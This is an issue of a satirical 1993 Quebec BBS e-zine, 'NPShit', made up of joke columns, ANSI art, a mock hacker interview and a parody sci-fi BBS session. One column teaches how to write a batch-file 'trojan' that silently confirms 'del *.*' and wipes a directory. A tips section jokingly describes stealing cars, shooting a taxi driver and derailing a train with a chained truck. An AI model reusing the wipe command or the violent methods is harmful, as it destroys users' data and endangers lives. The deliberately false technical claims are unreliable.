ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Bon, pause pub!
DENTAL FLUSH
la sommit en matire de tout
EST COMMANDIT PAR
P R O V I G R O S
Les articles de Dental Flush, les citrons de Provigros.
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
-=-= BATCH FILEZ AVANCEES =-=-
Construire un trojan en batch files
par Killer Ceiling Annihilator
Tout le monde pense qu'il faut un diplme d'tudes primaires
pour crire un trojan. Eh bien c'est faux: la preuve, j'en ai
crit un. (Je l'ai aussi essay, et j'ai perdu mon rpertoire,
alors il marche srement.)
Premirement, utilisez la puissante commande COPY CON pour
diter le trojan. Pour se faire, tapez COPY CON TROJAN.BAT. Tapez
ensuite ceci:
ecro Trojan (c)1993 by K.C.A
ecro Un instant SVP, j'efface votre rpertoire
ecro O>TROJAN.TMP
del *.*<TROJAN.TMP>NUL
Tapez <Ctrl-Z> et <Enter> pour finir. (C'est la partie
complique.)
Oups! Mon frre vient de m'avertir que je me suis tromp et
qu'il faut crire ECHO plutt qu'ECRO. Retapez donc votre
programme avec COPY CON:
echo Trojan (c)1993 by K.C.A
echo Un instant SVP, j'efface votre rpertoire
echo O>TROJAN.TMP
del *.*<TROJAN.TMP>NUL
Bon! Maintenant chargeons le programme. Tapez PROGRAMME.
Comme vous le voyez, il crit "Nom de commande ou de fichier non
valide" ou un message en anglais. Si c'est un message en anglais,
NPShit pense
vous! Retapez le programme avec "Y" au lieu de
"O"!
ecro Trojan (c)1993 by K.C.A
ecro Un instant SVP, j'efface votre rpertoire
ecro Y>TROJAN.TMP
del *.*<TROJAN.TMP>NUL
Ah non, j'ai encore crit ECRO!
echo Trojan (c)1993 by K.C.A
echo Un instant SVP, j'efface votre rpertoire
echo Y>TROJAN.TMP
del *.*<TROJAN.TMP>NUL
Bon, enfin! A prsent, tapez TROJAN. Le programme de trojan
devrait fonctionner. Et alors, par le fait mme, votre batch file
s'auto-effacera puisqu'elle est dans le rpertoire qu'elle
efface. C'est compliqu, mais c'est mon frre qui vient de me
confirmer a.
Alors retapez votre batch file. (a me tente pas de la
retaper moi aussi, faque dbrouillez-vous.) Je vais vous
expliquer, ligne par ligne, comment fonctionne le programme.
echo Trojan (c)1993 by K.C.A
Cette ligne me permet de garder des droits d'auteur sur mon
programme. (K.C.A sont les initiales de mon handle Killer Ceiling
Annihilator.) De cette faon je pourrais dcider que les
utilisateurs du trojan me doivent des frais de disons 30$ pour
l'enregistrer.
echo Un instant SVP, j'efface votre rpertoire
Il est important de toujours crire ce que la batch file
fait, sinon, pendant les longs travaux, l'utilisateur pourrait
croire que son ordinateur est plant, et il pourrait mme le
rebooter, ce qui ne laisserait pas le temps
la batch file
d'effacer tout le rpertoire.
echo O>TROJAN.TMP
del *.*<TROJAN.TMP>NUL
Ces deux lignes prises dans un magazine sont trs simples,
mais brivement, c'est que zro doit tre plus grand que le
contenu de TROJAN.TMP, qui soit dit en passant, est un fichier.
Le rsultat fait que ce qui est effac n'inclut pas TROJAN.TMP.
On peut aussi voir le mot NUL
la droite, qui dsigne
l'utilisateur.
Comme vous le voyez, crire un trojan est trs facile: a ne
m'a pris que quelques heures
le transcrire du magazine. Une
chose, cependant, est importante lorsque vous utilisez COPY CON.
Assurez-vous toujours que vous avez COPY CON.COM dans votre
rpertoire DOS!
Et pour terminer, pas un mot mais bien une PHRASE en anglais
pour avoir l'air pro et intelligent: "Hasta la Vista baby!"
Killer Ceiling Annihilator
(handle (c)1993 by mon frre)
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
COMMENT GONFLER UN TEXTE POUR QUE L'ARCHIVE SOIT
PLUS GROSSE by Explosive Banana
Comme vous le savez, quand on fait la publicit d'un texte ou
journal, c'est beaucoup plus attirant lorsqu'il possde 500k plutot que
120... Alors, il y a un petit truc que certains diteurs utilisent, on
appelle a du gonflage de fichiers. Tout ce que vous avez
faire, c'est de
dire des niaiseries qui ne tiennent pas debout pendant le plus de temps que
vous pouvez, bref, vous dites des choses qui ne tiennent pas debout, des
choses qui font passer le temps au monde qui vous croient comme des fishs..
Bref, tout ce qui n'a pas d'allure, est bon
tre dit... Cet exemple est
pour un fichier texte, comme l'exemple d'un journal...
Dans le cas d'un ANSI, ben vous pouvez mettre un paquet de caractres
blancs, comme a, personne ne va s'en rendre compte, et encore une fois, vous
pourrez traiter vos lecteurs de fishs...
Je crois que continuer a donner des exemples, ne serait qu'une perte
de temps pour moi, car vous avez surement ralis que c'est ce que je fais
depuis un ti-boutte de temps.
Bref, sans ce texte stupide, et sans aucune importance, notre journal
aurait sans doute un ti-peu moins gros, donc un ti-peu moins attirant pour
vous alors, je tiens
vous prvenir, car beaucoup de monde font a... Donc,
si notre prochain numro n'a que 100k, dites-vous que peut-tre qu'il sera
intelligent, mais je ne vous promet rien, le but de NPShit tant principa-
lement bas sur le stupide.
NpShit a fourni un dmo, dans ce fichier (Trs beau dmo en passant,
merci
Jigsaw Destroyer) avec les sources en QuickBasic et en Pascal. On a
pas eu le temps de le faire en batch, en C, en Assembleur parce que c'tait
une perte de temps puisque personne aurait compris. Dans ce dmo, nous
donnons un exemple de gonflage. Le fichier NPSDEMO.EXE est plein d'overlay.
Un overlay, c'est quoi? heeeeee! C'est la traduction anglaise de remplissage
je crois. Enfin tout a pour dire que NPSDEMO.EXE est plein de vide.
Bonne journe
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Chronique
LES GRANDS HACKERS
DE QUEBEC
Aujourd'hui: Recontre avec YANKUL
Propos recueillis par Gelatine Butcher
Yankul, notre matre hacker, notre Dieu
tous, et aussi le
seul
vouloir nous accorder une entrevue, est une personne qui a
de grands idaux et un gros ordinateur. Il nous a racont sa
petite histoire vcue qui est recopie ici tout-
-fait
INTEGRALEMENT, car comme Yankul nous a chaleureusement fait
remarquer, "Vous crivez des conneries pis je vous bute!" Yankul,
toi!
Y Vous savez, je suis presque n avec un clavier dans le
front pis un set de slots dans le cul. L'ordinateur n'tait
mme pas invent que je hackais des programmes! J'ai t
le premier
avoir le prog de BBS Forum, qui tait
l'poque
sur des cartes perfores. Les machines marchaient
la
manivelle. Y avait pas des bus internes, mais bien des
calches! On se loggait sur les boards en 14,400 caractres
l'heure. En fait,
part mon board, il n'y avait que le
Micro-Babillard
Qubec.
NPS Quel genre d'ordinateur aviez-vous, matre?
Y J'avais un Amiga au dbut, mais j'ai fini par changer
pour un Coco 10.
NPS Comment a, Coco 10, vnrable supriorit?
Y 10, c'est 2 en binaire. A l'poque, fallait tout entrer
en binaire avec un interrupteur. Comme c'tait assez
long, on avait mis un inactivity timeout de 2 heures.
Une chance que nous tions deux soit moi et mon assistant
Koolaid.
NPS Quels ont t vos dbuts en hackage, Dieu absolu?
Y Comme tout le monde, j'ai fait un Forum Hack. J'y ai
aussi install les toutes premires doors comme Essaie Re
et Cul Vdor (Fantasy Land n'a rien invent.) J'ai aussi
t le premier beta tester de Grumaute Editorial. Mais
pour le hackage, ben j'ai hack Essaie Re, Cul Vdor et
Grumaute Editorial.
NPS Et votre bab, splendide grandeur? C'tait difficile
faire runner dans ce temps-l
?
Y Plutt, oui. Vu qu'il n'y avait pas de tlphone, on
devait ploguer le modem sur des botes de conserves,
comme dans Passe-Partout finalement. Et dj
cette
poque, la GRC tait toujours rendue chez nous parce que
j'tais le seul board pirate
Qubec. Mais je me suis
jamais fait pogner!
NPS Vous avez eu de la luck!
Y Non, j'utilisais Before.
NPS Finalement, avez-vous un mot de la fin pour nos lecteurs?
Y Oui. Je trouve a poche que des petits twits se prennent
pour des hackers professionnels.
NPS Vous avez bien raison et je vais de ce pas me jeter dans
la fosse de l'Oubli Eternel, suprmatie de l'importance.
Y De rien. a fera 50$ pour la consultation.
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
+- | +-+ +-- | | N e w z !
+- | +-+ +-+ +-+
| +- | | --+ | | Ansi (c)Caillou Chanceux
COULEUR!
On a dernirement invent un jaune fluo tellement fluo qu'il fait du
bruit. "Fwitt", a-t-il dclar hier en confrence de presse.
Organic Terminology
EXPLICATION DE LA VITESSE DES
586...
Aprs une tude approfondie faite par l'quipe complte de NPShit,
nous avons dcouvert que la vitesse des ordinateurs 586 tait relie au fait
que le BUS avait t chang par des METROBUS... La compagnie IBM a fait
savoir
notre magazine que celle-ci attendait aprs le Ministre des trans-
ports de Qubec pour qu'ils lui sortent une nouvelle patente pour pouvoir
enfin sortir leur ordinateur 686-266 Mhz. Le Prsident de IBM dit que
si la CTCUQ ne se grouille pas, peut-tre que ceux-ci se tourneront vers la
compagnie Air-France, et peut-tre que nous aurons droit au...... CONCORDBUS
mais cette decision ne sera sans doute prise avant la parution de notre
prochain numero de NPShit.....
Important
savoir: On nous dit que le terme DX et SX tait d au
fait que le BUS comportait un simple ou un double set de roues. Vous compren-
drez que plus le BUS a de roues, plus il est rapide. Si vous tes devant
un DX2, c'est donc dire qu'il a un turbo racteur? On l'sait pas mais on va
vous inventer de quoi pour expliquer a dans la prochaine issue de NpShit!
Explosive Banana
NOUVEAU SYSTEME NUMERIQUE
Un nouveau systme numrique a vu le jour! Aprs la base 8 (le
systme octal) voici la base 69, le systme ANAL!
Null Character
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Assembly Cronik
The INTERRUPT Z
by Socks Yogurt Eater
Yo man, programmer, ici in NPShit on a une great news! Aprs
l'interrupt AH (which makes yer computer shouts) and the F-18 int
(which makes yer comp crashes) here is: L'INTERRUPT Z.
This interrupt a t foutu l
(yo man) by a big computor
constructor --EPSON. (Dont nous tairons le nom) What does it
does? Trs simple et hyper-mega-k00l man, it does une auto-
destruction total & complete of the ordinateur.
To use it, quite facile. Do a fichier batch with this dedans:
ECHO Demo of INTERRUPT Z (c)1993 Socks Yogurt Eater Inc.
ECHO One moment, auto-destruction...
INT Z
Evidemment, I'm not this fish! J'ai pas runn le prog! But
d'aprs LA revue o je l'ai copi, IT WORKS! So, if a commence
teller des menteries, who do ya wanna believe, man?
Socks Yogurt Eater
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Les BOARDS PUBLIX
Une plaie pour la socit
par Fairy Compst
Sur les public boards, y a encore des criss de LamerZ qui
tranent. Euh... Kess tu dis Dental Flush? Pas de Z
LamerZ?
Ah? Pis je serais mieux de dire MORON. OK debord.
Sur les public boards, y a encore des criss de morons qui
tranent. Heureusement que moi et mes amis on a 22 ans et six
pieds 10 pour leur faire peur. L'autre jour sur un board
j'coeure un gars, pis je dcide d'envoyer chier la gang de
Lee Moaloo. Pis l
je vous mens pas, y a du MONDE qui m'ont REPLYE.
L
a m'a ben mis en maudit, kess tu veux que je leur dise!
Fallait tout le temps que je call ma mre pour qu'
l'crive mes
textes
ma place. Des fois
l'tait pas l
pis j'crivais
n'importe quoi vu qu'ils avaient raison. NON MAIS A TU DE
L'ALLURE? Du monde de LEE MOALOO qui se PERMETTENT d'avoir RAISON.
J'ai manqu de les fesser, mais on sait jamais, vu que Vnus fait
peut-tre 6 pieds 11 pis Cramix c'est pttre Arnold
Schwarzannamachinchose qui rentre sous un faux pseudo...
Hein? Quoi, Dental? Faut pas dire PSEUDO...? HANDLE? Ah? Euh,
pis en passant tu le trouves-tu beau mon handle? Mmm... Oui hein?
Ah, mon beau petit Dental Flush d'amour, viens ici que je
t'embrasse. Toi tu sais parler aux gars.
Fairy Gdge
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
T R U C S N P S H I T I E N S
Comment voler un char
Eeeeehhh... Maudite bonne question a. Beh, arrange-toi premirement
pour avoir les CLEFS du char. Si t'as pas les clefs tu vas tre pogn
pour casser la vitre, pis pour aller en Floride pour que a serve
quelque chose. Pis pour dmarrer, behh euh.. Check les films, ils font
un court-circuit dans le dmarreur, tk arrange-toi avec tes troubles.
Mais oubliez pas qu'il vous faut un permis pour le conduire ce char-l
,
sinon vous pourriez vous faire arrter!
Blackboard Warrior
Comment prendre le taxi gratos
C'est facile man! Tu call un taxi et tu tires dessus avec une 22! Pour
te procurer une 22, vraiment facile, tu piques le gun de chasse a ton
pre! Pis aprs, ben t'as un taxi pour toi tu-seul! Le pire, c'est que
ce truc-l
marche! a a t essay et russi par des jeunes de la poly
de Loretteville! La seule affaire, ben SVP dites pas
tout le monde que
c'est vous qui avez tir dessus!
The Serial Number
Comment faire drailler un train
Trouves-toi un de tes chums qui a un permis pis vole un gros truck
(Voir le truc de comment voler un char, mais
la place de prendre une
22 tu prends une 303 (Si tu sais pas o avoir ce gun, on peut faire un
article sur comment hacker la base de Valcartier.)) Pis t'essayes de
trouver une bonne chane, pis tu l'attaches sur ton truck pis sur la
rail (dboate si possible, pis la chane, vous attachez un boute sur
le truck et l'autre sur le rail, donc il est plus pratique d'avoir une
chane
deux bouts.) pis tu drailles (Tu startes le moteur du truck,
tu te mets en 1er vitesse (vitesse avant svp!) pis tu pses sur le gaz.)
Un coup la track draille, restez pas
attendre la venue du prochain
train assis sur des chaises de parterre en-dessous d'un parasol sur la
bord de la track avec votre popcorn et votre jus d'orange, a pourrait
avoir l'air louche pour les voisins.
Flour Rider
Comment sauver des 25 cents dans une cabine tlphonique
a c'est innocent d'aplomb! Tu connais-tu a, l'appel
frais virs?
Ben, pendant que la petite madame
l'autre bord
te demande ton nom,
tu dis ben vite "HeymamanchuauxGaleriesdelaCapitaleviensmechercher
la-
portedesjeux!" Pis l
ta maman a rien qu'
pas accepter les frais pis
venir te chercher!
Par contre, pour se logger sur un board, c'est plus difficile, parce que
la tlphoniste ne supporte pas l'mulation ANSI.
Blitzcrest
Comment trouver des ANSiS pour son BBS
Facile! Copiez sur les autres boards pis dites au monde que c'tait un
concours! Il est recommand d'enregistrer son Copyright aprs!
Notice: Si y a kekun qui vous chat parce qui s'est rendu compte que
c'est pas vos ansis, ben dtournez la conversation en le flicitant
pour son dernier programme (leech-leech-leech)
(c)Caillou Chanceux
Comment savoir l'heure quand vous avez pas votre montre
Gang de niochons! Ouvrez votre ordi! Si y a une horloge interne c'est
pas pour rien!
the STaFF
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Chronique "Exemples de programmes difficiles"
par PCMagazine, en fait
(comme tous les autres articles)
Pour notre plus grand bnfice
tous nous avons piqu dans
des revues ces courts extraits de programmes qui parleront d'eux-
mmes. Essayez-les pour vous aider
commencer dans un ou l'autre
de ces langages! (Comme nous ne comprenons rien
ceux-ci (Sauf
pour les batch) il n'y aura pas d'explications donnes.)
- Batch file -
SET LAME=NPSHIT
:LOOP
ECHO NPShit, the New generation of young twits
IF (%LAME%)==(NPSHIT) GOTO LOOP
- GW-BASIC -
10 MORON=1
20 PRINT"Hello, I'm Fairy Compst!":IF MORON=1 THEN 20
30 END
- QuickBASIC -
Moron = 1
DO
PRINT "Hello! I'm still Fairy Compst!"
LOOP WHILE Moron = 1
- Turbo Pascal -
(ce programme n'est pas assur de marcher)
var
lamer: boolean;
begin
lamer := true;
repeat
Writeln('NPShit's the best!');
until not lamer;
end.
- Turbo C++ -
void main(void)
{
int moron;
moron = 1;
while (moron)
printf("My name is Dental Flush\n");
}
- Assembleur -
.Model Small
.Stack 256
.Data
Lamer "NPShit is the best",13,10,"$"
Lamer2 db 00;
.Code
MOV AX,@Data
MOV DS,AX
A:MOV DX,Offset Lamer
MOV AH,9
INT 21h
CMP [Lamer2],1
JNE A
MOV AX,4C00h
INT 21h
- {COMMO} -
{:LOOP} {SETV lame,true}
{DISP 1,1,07,Read NPShit and become stupid!}
{COMP lame,true} {IFCO LOOP}
{}
- Pseudo-Code -
LAMER <Ä VRAI
REPETER
ECRIRE "Dental Flush crit des bons articles"
TANT QUE LAMER
- ONS -
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ LAMER <Ä VRAI ³
ÃÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ ³ ECRIRE "Fairy Compst a 22 ans!" ³
³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ LAMER ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
- Ordinogramme -
ÚÄÄÄÄÄÄÄ¿
³ Dbut ³
ÀÄÄÄÂÄÄÄÙ
ÚÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄ¿
³ LAMER <Ä VRAI ³
ÀÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ECRIRE "NPShit is the best" ³<ÄÄÄ¿
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³
³ ³
/\ ³
/ \ VRAI ³
< LAMER? >ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
\ /
\/
³ FAUX
ÚÄÄÁÄÄ¿
³ FIN ³
ÀÄÄÄÄÄÙ
Note des rdacteurs
A la lumire de ces informations on peut constater que le langage le
plus puissant est le GW-BASIC car il ne prend que 3 lignes pour faire
le travail!
ÛÛ ÜÜ ÛÛÛÛÛÜ ÜÛþÛÛÛÜ ÛÛ |ÛÛ ÜÜþ Û ÜßßÜ ÜßßÜ Û Û Ûßß ÜÛ ÛÛÛ
ÛÛþ| ÛÛþ ÛÛ ßÛÛ ÛÛþ ßß ÛÛ ÜÜÜ ÛÛþÜÜ Û Û Û Û Û Û ßßß ÛÛÛ
ÛÛþÛÜ ÛÛþ ÛÛþÜÛÛÛ ÛÛþÛÛÜ ÛÛþÛßÛÛ ÛÛþ ÛÛþßß Û ßÜ ßÜ Û Û ÛÜ ÜÛÛÛÛÛ ÛÛÛ ÛÛ
ÛÛþßÛÛÛÛþ ÛÛþßß ÜÜ ßÛÛ ÛÛþ| ÛÛ ÛÛþ ÛÛÛÜ Û Û Û Û Û Û ÛÛÛ
ÛÛÛ ßÛÛÛ ÛÛþ ßÛÛÛÛÛÛ ÛÛþ ÛÛ ÛÛþ ßÛÛÛÛ Û ßÜÜß ßÜÜß ßÜÜß ÛÜÜ ÛÛÛ
Chronique ==-FICTION-== fiction fiction fiction... (yoo l'cho)
pAr L'oGRe RuSSe
tHiS iZ ThE sTorY Of A NpShIt OffIcEr In A QuEbEc cIty Bbs
In tHe YeAR 3045. WeLL iT's COmPLiCaTeD tO WrIte ThIs WaY
sO fuck the bidigital writing.
-*-
Hello. My name is L'ogre Russe Jr. Now I'm about to enter
Galactwit BBS, the biggest board in Quebec City. Since it
has 45674 unlimited nodes there's no need for autodial. I
am currently using Telix 87.92 (Seems just like 3.12)
Welcome on
+---+ +---+ + +---+ +---+ +-+-+ + + + + +-+-+
| | | | | | | | | | | | |
| -+ +---+ | +---+ | | | | | | |
| | | | | | | | | | | | | |
+---+ + + +--+ + + +---+ + +-+-+ + + BBS
Home of NpShit!
Ansi (C)Caillou Chanceux Jr.
{ Galactwit is using Future BBS, the most powerful BBS
program in the world. It is wonderful. Anyway it is a lot
like SuperBBS 1.17 so it's not too complicated to use. }
Future BBS 1465.676.001 logon
Name : L'ogre Russe Jr.
Password: ******
{ You can't see my password! Nyah Nyah Nyah! }
Choose Language:
1 - English
2 - English
3 - English
Which language? 1
{ There are no other languages than English here in 3045.
French language and all other languages in the world have
been deleted accidentally by the SysOp. }
Welcome L'ogre Russe Jr. on Galactwit BBS.
You are the 785747894857th caller.
Press [Enter]
Grumaute Editorial 4783.89á (c)3045 by David Esturgeon from Bigoudeware
Sorry (c)Caillou Chanceux, you can't hack this program!
This is a beta test. If you have questions or whatever, ya know what to do
+-+ +-+ + +-+ +-+ +++ +++ + +++
| | | | | | | | ||| | |
| + +-+ | +-+ | | ||| | |
| | | | | | | | | ||| | |
+-+ + + +-+ + + +-+ + +++ + +
Your Editor: Daniel Boudin Jr.
------------------------------------------------------------------------------
+ + +-+ + + +-+ +
| | | | | | | |
+-+ +-+ | | | | |
| | | | | | |
+ + +-+ +-+ +-+ +-+ +
Sunday, 3045/45/55
Hi! It's Blitzcrest Jr! Well all is going very good here! We're AT
LEAST going to get a CD-ROM on our board!
By the way, NpShit #456335 will talk about Guatemala birds sexual
approaches in winter.
BLITZCREST JR.
------------------------------------------------------------------------------
[Enter]
{ The news are wonderful. Anyway it's mostly because they're
done by Blitzcrest Jr, coz Daniel Boudin Jr. isn't very
good in syntax and grammar. }
+-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + +
| | | | | | | | | | | | | | | | | |
| | | +-+ | | | | | | | +-+ | | | | |
| | | | | | | | | | | | | | | | | |
+ + + + + + + +-+ + + + +-+ + +-+ +-+
+-------+
| |\ | |
| | \ | | NpShit Support Area of Quebec City!!!!!!!
| | \| |
+-------+
(m)essage (f)ile (b)ulletin (!)logoff
Main menu (c)Caillou Chanceux Jr.
Your command: C
This is not a command idiot, this is the copyright sign!
Press [Enter] fucking moron:
{ Oops.. Fuck I'm embarrassed... }
+-+-+ +-+ + +-+ + +-+-+ +-+ +-+ + + +
| | | | | | | | | | | | | | | | | |
| | | +-+ | | | | | | | +-+ | | | | |
| | | | | | | | | | | | | | | | | |
